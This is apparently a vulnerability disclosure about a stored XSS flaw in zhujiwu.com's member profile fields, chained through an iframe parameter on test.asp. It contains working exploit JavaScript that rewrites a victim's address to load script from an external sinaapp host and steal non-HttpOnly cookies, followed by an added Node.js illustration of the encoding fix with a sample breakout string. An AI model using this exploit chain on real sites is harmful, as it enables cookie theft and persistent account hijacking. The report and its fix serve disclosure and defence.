Zhujiwu (host house) has a self-XSS point that can be turned into a usable one. In the member center, the personal-information fields for detailed address, contact person and QQ store the payload `"><input type="hidden` without encoding. At first this looked like only a self-XSS, since nobody else seemed to view the personal-information page (@Xiaochuan). Searching further, I found the address http://www.zhujiwu.com/test/test.asp, which appears to be some kind of whitelist check; I really don't know what this URL is for. Its url parameter is placed directly into the src of an iframe, so it acts as a framing/XSS point on the whitelisted domain and can be used to reach the self-XSS point. So we construct the following JavaScript:
    <meta charset="utf8">
    <script language="javascript">
    // Create an XMLHttpRequest object, with ActiveX fallbacks for old IE.
    function createRequest() {
        var xmlHttp = false;
        if (window.XMLHttpRequest) {
            xmlHttp = new XMLHttpRequest();
        } else if (window.ActiveXObject) {
            try {
                xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
            } catch (error1) {
                try {
                    xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
                } catch (error2) {
                    xmlHttp = false;
                }
            }
        }
        return xmlHttp;
    }

    // Step 1: fetch the profile page to read the user's current address.
    var getAddress;
    if (getAddress = createRequest()) {
        getAddress.open("GET", "/member/account/basic.asp");
        getAddress.onreadystatechange = updatePage;
        getAddress.send(null);
    }

    var xml;
    function updatePage() {
        if (getAddress.readyState == 4) {
            if (getAddress.status == 200) {
                var str = getAddress.responseText;
                // Pull the existing value out of the Address input of the returned form.
                var rex = /name="Address" value="(.*)" size="38"/;
                var ttt = rex.exec(str);
                // Step 2: save the profile again with the payload appended to the address.
                if (xml = createRequest()) {
                    xml.open("POST", "/cmd/member/setBasic.asp?cmd=set");
                    xml.onreadystatechange = attack;
                    var body = "areaID=0&provinceID=1&cityID=1&Address=" + encodeURI(ttt[1]) + "%22%3E%3Cscript%20src%3Dhttp%3A%2F%2Fxssl.sinaapp.com%2F0S3c9D%3F1383890465%3E%3C%2Fscript%3E%3Cinput%20type%3D%22hidden&=&LinkMan=asdf&Tel=12345789&QQ=123456789&=%E4%BF%9D%E5%AD%98%E4%BF%AE%E6%94%B9&";
                    xml.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                    xml.send(body);
                }
            } else if (getAddress.status == 404) {
                alert("404");
            } else {
                alert("status:" + getAddress.statusText);
            }
        }
    }

    // Callback for the save request; nothing further is done on success.
    function attack() {
        if (xml.readyState == 4) {
            if (xml.status == 200) {
            }
        }
    }
    </script>
This reads the user's current detailed address and appends our code to it, so the change is disguised. Zhujiwu's cookie is not HttpOnly. To demonstrate the final step, we send the victim a link of the form http://www.zhujiwu.com/test/test.asp?url=xxxxx.sinaapp.com/xxxx.html (the SAE address cannot be disclosed, so it is masked here). Original page: [screenshot]. Cookie received after the URL is visited: [screenshot].
Many other people can see personal information as well, such as administrators! In this way, user accounts can be hijacked persistently. That's all.
Solution: encode the output at the three locations (detailed address, contact person, QQ).
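As an added illustration of that fix (example code written for this page, not code from the report or from zhujiwu.com), the snippet below renders the three profile fields once verbatim, the way the report says basic.asp does, and once through an HTML-attribute encoder, and adds a strict host allowlist for the url parameter that test.asp places into an iframe src. The field names and the `value="..." size="38"` layout follow the report; the allowlisted host, the sample profile and the breakout string are constructed assumptions. Since the site is classic ASP, this is a Node.js model of the logic, not ASP code.

```javascript
// Added example, not code from the original report: HTML-attribute encoding
// for the three member-center fields (Address, LinkMan, QQ) and a strict host
// allowlist for the "url" parameter that test.asp puts into an iframe src.
// Field names and the value="..." size="38" layout come from the report; the
// allowlist host, sample profile and breakout string are assumptions.

const SITE_ORIGIN = "http://www.zhujiwu.com";              // from the report
const ALLOWED_IFRAME_HOSTS = new Set(["www.zhujiwu.com"]); // assumed allowlist

// Escape every character that can terminate or alter a quoted attribute.
function encodeHtmlAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// The unsafe pattern the report describes: stored values echoed verbatim
// into the value="..." attributes of the profile form.
function renderProfileUnsafe(p) {
  return [
    `<input name="Address" value="${p.Address}" size="38">`,
    `<input name="LinkMan" value="${p.LinkMan}">`,
    `<input name="QQ" value="${p.QQ}">`,
  ].join("\n");
}

// The fix: encode at the three output points, so stored data cannot add tags.
function renderProfileSafe(p) {
  return [
    `<input name="Address" value="${encodeHtmlAttr(p.Address)}" size="38">`,
    `<input name="LinkMan" value="${encodeHtmlAttr(p.LinkMan)}">`,
    `<input name="QQ" value="${encodeHtmlAttr(p.QQ)}">`,
  ].join("\n");
}

// Crude check for a test: count start tags in the rendered HTML.
function countStartTags(html) {
  return (html.match(/<[a-z]/gi) || []).length;
}

// For test.asp: resolve the url parameter against the site, accept only
// http(s) URLs on an allowlisted host, and return an attribute-safe absolute
// URL, or null when the parameter must be rejected.
function iframeSrcForUrl(rawUrl) {
  let u;
  try {
    u = new URL(String(rawUrl), SITE_ORIGIN + "/");
  } catch (e) {
    return null;
  }
  if (u.protocol !== "http:" && u.protocol !== "https:") return null;
  if (!ALLOWED_IFRAME_HOSTS.has(u.hostname)) return null;
  return encodeHtmlAttr(u.href);
}

// Constructed sample profile carrying an attribute-breakout string of the
// same shape as the one the report found stored in the address field.
const EVIL_PROFILE = {
  Address: '"><script>alert(1)</script><input type="hidden',
  LinkMan: "asdf",
  QQ: "123456789",
};

if (typeof require !== "undefined" && require.main === module) {
  console.log(renderProfileUnsafe(EVIL_PROFILE)); // attribute broken, 2 extra tags
  console.log(renderProfileSafe(EVIL_PROFILE));   // still three <input> elements
  console.log(iframeSrcForUrl("http://xxxxx.sinaapp.com/xxxx.html")); // null
}
```

The encoder is applied at the output point rather than on input, which is what the report's solution asks for: the stored value may still contain quotes and angle brackets, but the form can no longer grow new elements from it. Marking the session cookie HttpOnly, which the report notes is missing, limits cookie theft but does not stop script that runs in the victim's session from rewriting the profile, so the encoding is the primary fix.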